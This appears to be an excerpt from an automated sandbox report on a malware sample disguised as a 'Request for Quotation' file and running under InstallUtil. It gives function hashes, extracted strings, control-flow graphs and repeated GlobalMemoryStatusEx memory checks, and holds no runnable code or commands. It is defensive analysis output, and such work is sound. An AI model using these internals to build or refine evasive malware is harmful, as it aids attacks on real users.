                                                • Instruction Fuzzy Hash: F1410570D14218DFDB54DFA9C854BAEBBB2BB89300F0086AAD50AB7344D7745A85CF90
                                                Function 06374302 Relevance: 5.2, Strings: 4, Instructions: 234COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (_eq$(_eq$(_eq$(_eq
                                                • API String ID: 0-3755777045
                                                • Opcode ID: 3c473ffcce18de16f8c6024944d737dca5c6b461379cc8df0bd3e2942f665d70
                                                • Instruction ID: fb87722ec5bcd65aa0d2178a9adf85d602a0c4342d8e909088cb32ea81efaa2a
                                                • Opcode Fuzzy Hash: 3c473ffcce18de16f8c6024944d737dca5c6b461379cc8df0bd3e2942f665d70
                                                • Instruction Fuzzy Hash: 2671F571B002449FC794AB78C8549AE7BF6EF86304B1045AEE9469B352DB35EC42CBD1
                                                Function 06236EB4 Relevance: 5.0, Strings: 4, Instructions: 37COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2176729190.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6230000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$+$V$Y
                                                • API String ID: 0-680327513
                                                • Opcode ID: 475b43caa1b94e2bd9d95e4fc1cb625cccdde1891d37d600d6d20671222048ff
                                                • Instruction ID: 2fbcf6864d4da1412ef5b6deabbc5c7c83fa2bfd7e01dbb86d9a1ca1c7b195a1
                                                • Opcode Fuzzy Hash: 475b43caa1b94e2bd9d95e4fc1cb625cccdde1891d37d600d6d20671222048ff
                                                • Instruction Fuzzy Hash: A511DDB0D20228DFDB90DF64C8987CCBBB5BF09315F5090A9D509AB251D7704A88CF15

                                                Execution Graph

                                                Execution Coverage:11.4%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:26
                                                Total number of Limit Nodes:5
                                                execution_graph 27934 2750848 27936 275084e 27934->27936 27935 275091b 27936->27935 27939 2751340 27936->27939 27944 2751452 27936->27944 27941 2751356 27939->27941 27940 2751448 27940->27936 27941->27940 27943 2751452 GlobalMemoryStatusEx 27941->27943 27950 2757059 27941->27950 27943->27941 27946 2751356 27944->27946 27947 275145b 27944->27947 27945 2751448 27945->27936 27946->27945 27948 2757059 GlobalMemoryStatusEx 27946->27948 27949 2751452 GlobalMemoryStatusEx 27946->27949 27947->27936 27948->27946 27949->27946 27952 2757063 27950->27952 27951 2757119 27951->27941 27952->27951 27955 5f1ce88 27952->27955 27960 5f1ce78 27952->27960 27956 5f1ce9d 27955->27956 27957 5f1d0b2 27956->27957 27958 5f1d4d0 GlobalMemoryStatusEx 27956->27958 27959 5f1d730 GlobalMemoryStatusEx 27956->27959 27957->27951 27958->27956 27959->27956 27961 5f1ce9d 27960->27961 27962 5f1d0b2 27961->27962 27963 5f1d730 GlobalMemoryStatusEx 27961->27963 27964 5f1d4d0 GlobalMemoryStatusEx 27961->27964 27962->27951 27963->27961 27964->27961

                                                Executed Functions

                                                Function 02759C68 Relevance: 2.8, Instructions: 2775COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0579fa3c88723f03a0e36a91392b2d4cd21bc2b862e04043a6de96f5aaf7bc21
                                                • Instruction ID: 52144c6a869ebce6654ca346c9d36ff5bdf763f9ed38b80f397a0f8cc054c3f2
                                                • Opcode Fuzzy Hash: 0579fa3c88723f03a0e36a91392b2d4cd21bc2b862e04043a6de96f5aaf7bc21
                                                • Instruction Fuzzy Hash: 1F53D731D10B1A8EDB11EB68C8846A9F7B1FF99300F11D79AE45977121EB70AAD4CF81
                                                Function 0275CF28 Relevance: 2.4, Instructions: 2399COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5e74a0726900dec412964c3d82097bc14aba65fb09c221017121720852ede626
                                                • Instruction ID: 4fc50b507fe4e2cab02b9785d962562bbe88c1bc2e60528e6b1ee6e5b24997ab
                                                • Opcode Fuzzy Hash: 5e74a0726900dec412964c3d82097bc14aba65fb09c221017121720852ede626
                                                • Instruction Fuzzy Hash: CA332E31D10B198EDB11DF68C8846ADF7B1FF99300F15C79AE459A7221EB70AAC5CB81
                                                Function 02754A60 Relevance: .3, Instructions: 266COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f88e35e156a959390011331a795b9e3d901ec4a71f7e03ede38a8f3b1ac7f998
                                                • Instruction ID: 094656c50e4e8e908e01eeda05001fce4930e8a06d973335b3e0b0b4430e5f49
                                                • Opcode Fuzzy Hash: f88e35e156a959390011331a795b9e3d901ec4a71f7e03ede38a8f3b1ac7f998
                                                • Instruction Fuzzy Hash: 3AB16D74E00229CFDB10CFA9D9A179DFBF2BF88314F148529D815E7294EBB49885CB91
                                                Function 02753E48 Relevance: .2, Instructions: 238COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 02037abf0ea1aae25e3cef2ec6ee8439bdf349338e36760567a0ffa1fe6b0425
                                                • Instruction ID: bdc15204c047ee97705bde8019f1e774b0edfb55b53c740b39669b93e5d07f3e
                                                • Opcode Fuzzy Hash: 02037abf0ea1aae25e3cef2ec6ee8439bdf349338e36760567a0ffa1fe6b0425
                                                • Instruction Fuzzy Hash: 8F915270E00219DFDF10CFA9C99579DFBF2BF48354F248129E819A72A4EBB49885CB51
                                                Function 02756F28 Relevance: 2.7, Strings: 2, Instructions: 151COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2147 2756f28-2756f29 2148 2756f9b-2756f9f 2147->2148 2149 2756f2b-2756f3c 2147->2149 2150 2756fa4-2756fa7 2148->2150 2151 2756ec2-2756ec6 2149->2151 2152 2756f3e-2756f55 2149->2152 2153 2756fe3-2756fe6 2150->2153 2154 2756fa9-2756fde 2150->2154 2160 2756eb1-2756ebe 2151->2160 2161 2756ec8-2756f0a call 2756c08 2151->2161 2159 2756f57-2756f5a 2152->2159 2157 2756ff6-2756ff8 2153->2157 2158 2756fe8 call 2757988 2153->2158 2154->2153 2164 2756fff-2757002 2157->2164 2165 2756ffa 2157->2165 2168 2756fee-2756ff1 2158->2168 2162 2756f8d-2756f90 2159->2162 2163 2756f5c-2756f70 2159->2163 2160->2151 2190 2756f26 2161->2190 2191 2756f0c-2756f25 call 2756724 2161->2191 2162->2150 2167 2756f92-2756f99 2162->2167 2175 2756f76 2163->2175 2176 2756f72-2756f74 2163->2176 2164->2159 2169 2757008-2757017 2164->2169 2165->2164 2171 2756f9f 2167->2171 2172 2757168-275716f 2167->2172 2168->2157 2178 2757041-2757056 2169->2178 2179 2757019-275701c 2169->2179 2171->2150 2177 2756f79-2756f88 2175->2177 2176->2177 2177->2162 2178->2172 2183 2757024-275703f 2179->2183 2183->2178 2183->2179 2190->2147
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LReq$LReq
                                                • API String ID: 0-1701832695
                                                • Opcode ID: 368585942a9f87e31b9f505e8b41164a36e7765f0d6a44833b84a1ed31fcaa0e
                                                • Instruction ID: 316c1f98ca9af5a2f4f82a53233eb89b4f484419efb82ace348adc7a736fc6d8
                                                • Opcode Fuzzy Hash: 368585942a9f87e31b9f505e8b41164a36e7765f0d6a44833b84a1ed31fcaa0e
                                                • Instruction Fuzzy Hash: 5651BE30E002299FDB15DF75C45479EFBB6EF86310F50846AE806EB290EBB1D846CB90
                                                Function 05F1E090 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2842 5f1e090-5f1e0ab 2843 5f1e0d5-5f1e0e8 2842->2843 2844 5f1e0ad-5f1e0d4 call 5f1d4c0 2842->2844 2848 5f1e0eb-5f1e0f4 call 5f1d808 2843->2848 2851 5f1e0f6-5f1e0f9 2848->2851 2852 5f1e0fa-5f1e138 2848->2852 2852->2848 2857 5f1e13a-5f1e159 2852->2857 2860 5f1e15b-5f1e15e 2857->2860 2861 5f1e15f-5f1e1ec GlobalMemoryStatusEx 2857->2861 2865 5f1e1f5-5f1e21d 2861->2865 2866 5f1e1ee-5f1e1f4 2861->2866 2866->2865
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2330573771.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_5f10000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 94de87101d2101fae47cf0d475568e16970554916479fe5d5e577dbe57d0143a
                                                • Instruction ID: c4778432f172e692182e80f336d0866ef6f9be3e54562f67cec15acffcd40126
                                                • Opcode Fuzzy Hash: 94de87101d2101fae47cf0d475568e16970554916479fe5d5e577dbe57d0143a
                                                • Instruction Fuzzy Hash: 9D41F072E042598FCB04DF69D84479EBBF5EF89310F14852AE904AB241EB789980CBD0
                                                Function 05F1E178 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2869 5f1e178-5f1e1b6 2870 5f1e1be-5f1e1ec GlobalMemoryStatusEx 2869->2870 2871 5f1e1f5-5f1e21d 2870->2871 2872 5f1e1ee-5f1e1f4 2870->2872 2872->2871
                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE ref: 05F1E1DF
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2330573771.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_5f10000_InstallUtil.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: de5cc0d50458bb60bc8ab91e9f46d0ab768d5269be6e7a4c7a938b6a854ef1cd
                                                • Instruction ID: 79af70e2bf789638501e9845981e8874de25854700be8c862df6a815f256e77c
                                                • Opcode Fuzzy Hash: de5cc0d50458bb60bc8ab91e9f46d0ab768d5269be6e7a4c7a938b6a854ef1cd
                                                • Instruction Fuzzy Hash: 2A11D3B1C006599BCB10CF9AC945BDEFBF8AB48320F14816AD918A7241D778A944CFA5
                                                Function 0275F48D Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2965 275f48d-275f4bb 2966 275f4bd-275f4c0 2965->2966 2967 275f4e3-275f4e5 2966->2967 2968 275f4c2-275f4de 2966->2968 2969 275f4e7 2967->2969 2970 275f4ec-275f4ef 2967->2970 2968->2967 2969->2970 2970->2966 2972 275f4f1-275f517 2970->2972 2977 275f51e-275f54c 2972->2977 2982 275f5c3-275f5e7 2977->2982 2983 275f54e-275f558 2977->2983 2989 275f5f1 2982->2989 2990 275f5e9 2982->2990 2987 275f570-275f5c1 2983->2987 2988 275f55a-275f560 2983->2988 2987->2982 2987->2983 2991 275f564-275f566 2988->2991 2992 275f562 2988->2992 2990->2989 2991->2987 2992->2987
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHeq
                                                • API String ID: 0-2873676430
                                                • Opcode ID: 2917a0df46407b90b6e52ccf67bcb10ef8223179b43e7b83dc935a4638bf7e5b
                                                • Instruction ID: 96f5abb84b7995130396581df1a620b99c494e41be22bc4b54e0d093251dd4e0
                                                • Opcode Fuzzy Hash: 2917a0df46407b90b6e52ccf67bcb10ef8223179b43e7b83dc935a4638bf7e5b
                                                • Instruction Fuzzy Hash: 3F41D370B002158FCB16AF74D55476EBBB3AF8A200B24496CD406EB395EF75CD86C791
                                                Function 02756F40 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LReq
                                                • API String ID: 0-2687900687
                                                • Opcode ID: d90937b398a9363b0ea44d6b6130ddd221285bb102808eff8cdda3aee606427c
                                                • Instruction ID: e2643d3be4447d9adf623fdbf008ccc37d1c6d883649080d808c0751dd2ea47b
                                                • Opcode Fuzzy Hash: d90937b398a9363b0ea44d6b6130ddd221285bb102808eff8cdda3aee606427c
                                                • Instruction Fuzzy Hash: 5C315075E102199BEB24CFA5D94079EF7B5FF85310F50852AE906EB284EBB1D846CB40
                                                Function 02756B48 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LReq
                                                • API String ID: 0-2687900687
                                                • Opcode ID: d14c46291e0a35e1ae1c18cae85fe1e2deec532cd2dc3ab9c3a4e6618d5e893e
                                                • Instruction ID: 357b4b007b2e50e2736421b5380025f51b96eac97380b96019e384e796b74002
                                                • Opcode Fuzzy Hash: d14c46291e0a35e1ae1c18cae85fe1e2deec532cd2dc3ab9c3a4e6618d5e893e
                                                • Instruction Fuzzy Hash: 012126716041614FC706FB3CD4257AEBBA1EF86300F5448AED480CB2AAEA719989C781
                                                Function 027591D1 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: W
                                                • API String ID: 0-655174618
                                                • Opcode ID: 5eb9984b8386ef9172baf80c354041c3960035e25b0daa267007db6dfcfefde2
                                                • Instruction ID: 5ab18319e873d88c60dde09e6c191b376e790f0a1594cf735951a5e6b8b20bf2
                                                • Opcode Fuzzy Hash: 5eb9984b8386ef9172baf80c354041c3960035e25b0daa267007db6dfcfefde2
                                                • Instruction Fuzzy Hash: 7D21B634E04619DBDB19CFA4C5946DEF7B2AF89300F10852AED15BB390EBB09846CB40
                                                Function 02757988 Relevance: .6, Instructions: 557COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e5b82de8f33eb53049c734b8ba7a26c722ae561cb0c9557cc8b7d1ebd8013b7f
                                                • Instruction ID: 2a8d6b229cd6a1caebee52e45414ce96eaa96ada6578a22ad624b0293e6f3077
                                                • Opcode Fuzzy Hash: e5b82de8f33eb53049c734b8ba7a26c722ae561cb0c9557cc8b7d1ebd8013b7f
                                                • Instruction Fuzzy Hash: FC1260747012058BCB16BB38E54572DB3A6FB89300B508E29E506DB796CF76EC87DB81
                                                Function 027593E4 Relevance: .4, Instructions: 364COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1f8b729086f58f5a755551e204f94881135e8357355d588d0714527c92c8a7db
                                                • Instruction ID: 123d6826bf8b5feeda01ee3f636d6b645bf0418af0dd76c47b23fde01e21cc19
                                                • Opcode Fuzzy Hash: 1f8b729086f58f5a755551e204f94881135e8357355d588d0714527c92c8a7db
                                                • Instruction Fuzzy Hash: 98D16E34B00215CFDB14DF68D584AADBBB2EF89310F148969E906EB395DB75DC82CB90
                                                Function 02759760 Relevance: .4, Instructions: 354COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aaf2bee8d98fd76b4ed43b4c37107e8a30c4c49ca127982ec3b385a62afc397f
                                                • Instruction ID: 77b6a3a95f8a8b5c28b912708d52926820f5cb3fdeb63a70294e0e485b0dc3b1
                                                • Opcode Fuzzy Hash: aaf2bee8d98fd76b4ed43b4c37107e8a30c4c49ca127982ec3b385a62afc397f
                                                • Instruction Fuzzy Hash: DEC1AE70B00215CFDB14CF68D9847AEFBA6FB88310F24856AEA09DB395D774D9418B90
                                                Function 02754A54 Relevance: .3, Instructions: 260COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4a0b00d361fbd9e84b5b30e60df503dbc47cc8306cfb0cefa8b218315b159149
                                                • Instruction ID: f21aa6749a95ef3ad8ab4ea8bb80e9cae57084bfa4c07197716bb9e37d0fb4c5
                                                • Opcode Fuzzy Hash: 4a0b00d361fbd9e84b5b30e60df503dbc47cc8306cfb0cefa8b218315b159149
                                                • Instruction Fuzzy Hash: 29B16C74E00629CFDB10CFA9D9A179DFBF2BF88314F148129E815A7254EBB49885CF91
                                                Function 02753E3E Relevance: .2, Instructions: 235COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ea61ca3e48dc674ede0ea1d890ed1f0fc713e346b88e457b43ef80fc86a3c0ac
                                                • Instruction ID: a057049b5965a3f9145b812b5ba31acd3e28e959a0d7ff2885f82cb310c95157
                                                • Opcode Fuzzy Hash: ea61ca3e48dc674ede0ea1d890ed1f0fc713e346b88e457b43ef80fc86a3c0ac
                                                • Instruction Fuzzy Hash: 2D917E70E00219DFDB10CFA8C9957DDFBF1BF48354F248169E819A72A4EBB49885CB81
                                                Function 02756CA4 Relevance: .1, Instructions: 135COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: da8835b0dc9da07693fbcde8dd4256c68919338027e37fe88775e26fd6c985a5
                                                • Instruction ID: ae4b144402e0d04f4ea364e4b52fe532c6a91c1aa86c0d9753d34647ce639e50
                                                • Opcode Fuzzy Hash: da8835b0dc9da07693fbcde8dd4256c68919338027e37fe88775e26fd6c985a5
                                                • Instruction Fuzzy Hash: 99510370D003288FDB14CFAAC885B9DFBB5FF48314F548529D815AB265D7B4A844CF90
                                                Function 02756CB0 Relevance: .1, Instructions: 132COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 411d362917c23982eb39d98b18ff16a94a977ebb63e39c3306a6dd65b7e6321c
                                                • Instruction ID: 24f4550176eb215eaaffa32e820dc36e10673ecdcfe81f0de3513e510c5acf30
                                                • Opcode Fuzzy Hash: 411d362917c23982eb39d98b18ff16a94a977ebb63e39c3306a6dd65b7e6321c
                                                • Instruction Fuzzy Hash: B05103B0D003288FDB14CFAAC885B9DFBB5BF48314F548519D815AB365DBB4A844CF91
                                                Function 02751128 Relevance: .1, Instructions: 106COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c2f7aac64d54188baf1ce72998328b28867816ddc6a362b6709abce814717b5c
                                                • Instruction ID: 0863eb0e126d46a9391fc7f2dd7b88e3461fa1d29249d18efdfee7625f7ed8ac
                                                • Opcode Fuzzy Hash: c2f7aac64d54188baf1ce72998328b28867816ddc6a362b6709abce814717b5c
                                                • Instruction Fuzzy Hash: 9B51DD7421A6868FCB07FB29FDD09467F75FB92B043404969E0447F27EDA30694ACB81
                                                Function 02751138 Relevance: .1, Instructions: 100COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cc2f1a9b89939e859e3a5477f2f0f61baf274aa332dd448a4a3af3f1c42c999e
                                                • Instruction ID: 755ffea081af5a66899685f57b3265b603f6280d94ca53e0c725fb006cc5c481
                                                • Opcode Fuzzy Hash: cc2f1a9b89939e859e3a5477f2f0f61baf274aa332dd448a4a3af3f1c42c999e
                                                • Instruction Fuzzy Hash: 2241CC7421A2868FCB07FB29FDD09467F75FB92B043404A69E0447F27EDA70694ACB81
                                                Function 02751788 Relevance: .1, Instructions: 92COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a89a3bd7aa0680c21c48bc8c79593652d54ebb80c952144279341672a153a516
                                                • Instruction ID: 809613a9fccb3ca7352d5e207b0f77e4eba51bf150b84d07314b65821b870481
                                                • Opcode Fuzzy Hash: a89a3bd7aa0680c21c48bc8c79593652d54ebb80c952144279341672a153a516
                                                • Instruction Fuzzy Hash: E5310679B041128FDF51AB78E84476EBBEAEB44651F500C65E809DB359EB74D842CB80
                                                Function 0275F360 Relevance: .1, Instructions: 91COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3cbc865ff8bf90d0ce9c7e7408cca7dad65e7c6ff1fdef543a58308bf8197fa3
                                                • Instruction ID: f7107661277904a0f7144d36850f42b92e6c073c6299429dea207ca5ac65d1a9
                                                • Opcode Fuzzy Hash: 3cbc865ff8bf90d0ce9c7e7408cca7dad65e7c6ff1fdef543a58308bf8197fa3
                                                • Instruction Fuzzy Hash: 3B317034E006199BDB19DF68D99469EF7B2FF89300F108529E816EB750DF70AC42CB51
                                                Function 027526A6 Relevance: .1, Instructions: 91COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: da1ed1134865508c9bc1c5a270ac04be829a71097cf0bf11fe010b787c46e61f
                                                • Instruction ID: 726e92e0248d3777fa5bc7d846cc639fa8fb11f06660c41147a74a28b8c93e2a
                                                • Opcode Fuzzy Hash: da1ed1134865508c9bc1c5a270ac04be829a71097cf0bf11fe010b787c46e61f
                                                • Instruction Fuzzy Hash: 5341F0B4D00249DFDB10CFA9C980A9EBFF5FF48310F248429E809AB254DB759985CF90
                                                Function 02755060 Relevance: .1, Instructions: 90COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ddd8bda0dd21c0471f552a64cd51c75527deabddbcd8de89a17f4d81e17b4845
                                                • Instruction ID: 9b69ec713d63055b6846425fc74ecdcad3cd30e7689faeb42852e55cf21b8111
                                                • Opcode Fuzzy Hash: ddd8bda0dd21c0471f552a64cd51c75527deabddbcd8de89a17f4d81e17b4845
                                                • Instruction Fuzzy Hash: 1F315830A04265CFDF15EB74C5506AEBBB2AF49304F500468D84AAB3A4EB76CC42CBA1
                                                Function 027526B0 Relevance: .1, Instructions: 90COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9ab45a924b6c02285007b263e0c90ea3fdfbcefc39ade6f21859c42b9d0b5d91
                                                • Instruction ID: b4f2858bf415ba47408b8a374b5466839f77312b5090c27569e1ea3a7cdad883
                                                • Opcode Fuzzy Hash: 9ab45a924b6c02285007b263e0c90ea3fdfbcefc39ade6f21859c42b9d0b5d91
                                                • Instruction Fuzzy Hash: F241EDB0D003499FDB10DFA9C984A9EBFF5FF48310F248429E809AB254DB75A945CB90
                                                Function 02755070 Relevance: .1, Instructions: 89COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2322470737.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2750000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
